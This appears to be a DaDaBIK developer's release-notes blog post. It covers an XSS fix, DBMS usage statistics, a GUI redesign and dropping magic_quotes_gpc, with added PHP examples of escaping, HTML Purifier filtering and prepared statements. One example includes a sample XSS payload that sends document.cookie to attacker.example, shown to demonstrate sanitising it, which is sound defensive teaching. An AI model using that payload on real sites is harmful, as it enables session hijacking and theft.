Last night I discovered an important security hole in DaDaBIK, so I decided to immediately release version 4.3 beta2 with the sole purpose of partially fixing it. All the other bug fixes and new features are waiting for version 4.3 rc1, available in 1 or 2 weeks as planned.
Among other problems, the hole allowed cross-site scripting (XSS) attacks (http://en.wikipedia.org/wiki/Cross-site_scripting), which in turn could give an attacker unauthorized access to the application by hijacking a logged-in user's session (http://en.wikipedia.org/wiki/Session_hijacking) and, if the user's browser had security holes of its own, even the execution of arbitrary code on the client machine.
The new 4.3 beta2 solves this problem. Even the DaDaBIK demo was affected and exploited by a malicious user; now it has been patched.
The problems described above can however still occur when the insert or edit feature is enabled (for at least one table) and the HTML content type is used: in that case the value is deliberately output as markup, so it cannot simply be escaped. At the moment there isn't a patch for this second scenario, so the HTML content type should be used very carefully, as highlighted in the updated documentation. In the next few days I would like to use something like http://htmlpurifier.org to allow users to insert HTML text without security problems.
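The two scenarios above call for two different defences, and the distinction is worth seeing in code. The following is an added example written for this page, not DaDaBIK's own code: a plain-text field is escaped on output, while an HTML field is filtered against an allowlist with HTML Purifier. It assumes HTML Purifier is installed through Composer (the `vendor/autoload.php` path and the allowlist are assumptions, not project settings).

```php
<?php
// Added example, not DaDaBIK code. Assumes HTML Purifier is installed via Composer.
require 'vendor/autoload.php';

// Plain-text field: encode every metacharacter on output, so whatever was
// stored in the database is displayed literally and can never become markup.
// This is the fix for the XSS hole described in the post.
function render_text($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// HTML content type: escaping would destroy the markup the user wants to keep,
// so the value is filtered instead. Only the listed elements/attributes and
// URI schemes survive; <script>, event handlers and javascript: URLs are dropped.
function render_html($value)
{
    $config = HTMLPurifier_Config::createDefault();
    // Allowlist is an assumption for the example; choose it per application.
    $config->set('HTML.Allowed', 'p,br,b,i,strong,em,ul,ol,li,a[href]');
    $config->set('URI.AllowedSchemes', array('http' => true, 'https' => true, 'mailto' => true));
    $purifier = new HTMLPurifier($config);
    return $purifier->purify($value);
}

// Constructed sample payload: the kind of value an attacker stores in a field
// to steal the session cookie of whoever views the record later.
$payload = '<b>hello</b>'
         . '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
         . '<a href="javascript:alert(1)">click</a>';

// Shown literally as text, no script runs.
echo render_text($payload), "\n";

// <b> survives, the <script> element is removed with its contents, and the
// javascript: link loses its href because the scheme is not in the allowlist.
echo render_html($payload), "\n";
```

Note that neither function protects a field if it is escaped on one page and forgotten on another: output encoding has to be applied at every place a stored value is printed, which is why a single rendering helper per content type is preferable to ad hoc `echo` calls.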
The 4.3 beta2 also fixes another minor GUI bug, as you can read from the changelog.
Starting with the last 4.3 beta, users can register their installation of DaDaBIK; I receive information about the DBMS type and DaDaBIK version.
97 installations have been registered so far and these are the statistics about the DBMSs usage:
MySQL: 95 installations
PostgreSQL: 2 installations
Oracle: 0 installations
MS SQL Server: 0 installations
97 is (statistically) still a small number, but I'm wondering whether DaDaBIK is still used with non-MySQL DBMSs... Maybe the typical Oracle or MS SQL Server user doesn't work much with PHP, but I don't think that's true for a PostgreSQL user.
I had decided to dedicate some time in the future to testing DaDaBIK with other DBMSs (SQLite and DB2), but if everybody's using MySQL I don't know if it's still a good idea.
I have finished the redesign of the admin section: new look, some improvements in the interface, in-line help for the interface configurator.
This will be released soon with DaDaBIK 4.3 release candidate 1, together with an improved documentation and a new enterprise-oriented demo (an invoicing system) that I'm developing.
I've cleaned up and slightly improved the demo section to make it easier to show some DaDaBIK features.
I've also made a downloadable version of the demo. This can be a good learning tool: by looking at the configuration/settings you can easily learn by example how to get the same result. Instructions on how to install the demo are included in the downloaded file. Available for MySQL only.
yes, difficult to believe but true!
DaDaBIK is powerful and easy to use, but the GUI has always been something that could hurt...
Why? Because I'm too nerdy to care about GUIs? No, just because, having limited time, I've always preferred to spend it improving the feature set and fixing bugs.
But your long wait is over: some days ago I discovered by chance a very nice DaDaBIK graphic customization made by Erik Pöher; I first started to implement that GUI but ended up developing the GUI from scratch, in part inspired by Erik's work. Here is the result: demo (user: demo1; password: password).
There is still space for improvement (better warning/error messages for example) but I think it's much better than before. Let me know what you think.
Another important improvement: magic_quotes_gpc set to On is no longer needed.
There are also several bug fixes, as you can see from the changelog; some new bugs were also discovered.
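Dropping the dependency on magic_quotes_gpc matters because the setting escapes input at the wrong boundary (it was later deprecated and removed from PHP altogether), so an application that relies on it breaks or becomes injectable when the host configuration changes. The following added example, not DaDaBIK's own code, shows the approach a PHP application can take instead: undo magic quotes if the host still has them on, so the data is what the user actually sent, and leave quoting to a prepared statement at the SQL boundary. The table, column and connection parameters are assumptions for the example.

```php
<?php
// Added example, not DaDaBIK code. Runs on PHP 5.x through 8.x.

// Reverse magic_quotes_gpc if it is on, recursively, because $_GET/$_POST
// values can be nested arrays. On PHP >= 8 the function no longer exists, so
// the guard simply returns the input unchanged.
function strip_magic_quotes($value)
{
    if (is_array($value)) {
        return array_map('strip_magic_quotes', $value);
    }
    return stripslashes($value);
}

function raw_input(array $source)
{
    if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
        return strip_magic_quotes($source);
    }
    return $source;
}

// Constructed input: the classic apostrophe case magic_quotes was meant to
// paper over, plus a nested value to exercise the recursion.
$request = array(
    'name'   => "O'Reilly",
    'filter' => array('city' => "L'Aquila"),
);
$input = raw_input($request);

// Quoting happens here, by the driver, for whatever DBMS is behind PDO. The
// value is sent as a parameter, never spliced into the SQL text, so neither
// magic_quotes nor manual addslashes() is needed. Connection details assumed.
$pdo = new PDO('mysql:host=localhost;dbname=dadabik', 'user', 'secret', array(
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
));
$stmt = $pdo->prepare('SELECT * FROM customers WHERE name = :name AND city = :city');
$stmt->execute(array(
    ':name' => $input['name'],
    ':city' => $input['filter']['city'],
));
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
```

Note that the same normalisation has to be applied before the value is stored or displayed, otherwise a host with magic_quotes_gpc on would save `O\'Reilly` into the table and a host with it off would not, which is exactly the inconsistency that made the setting unsafe to depend on.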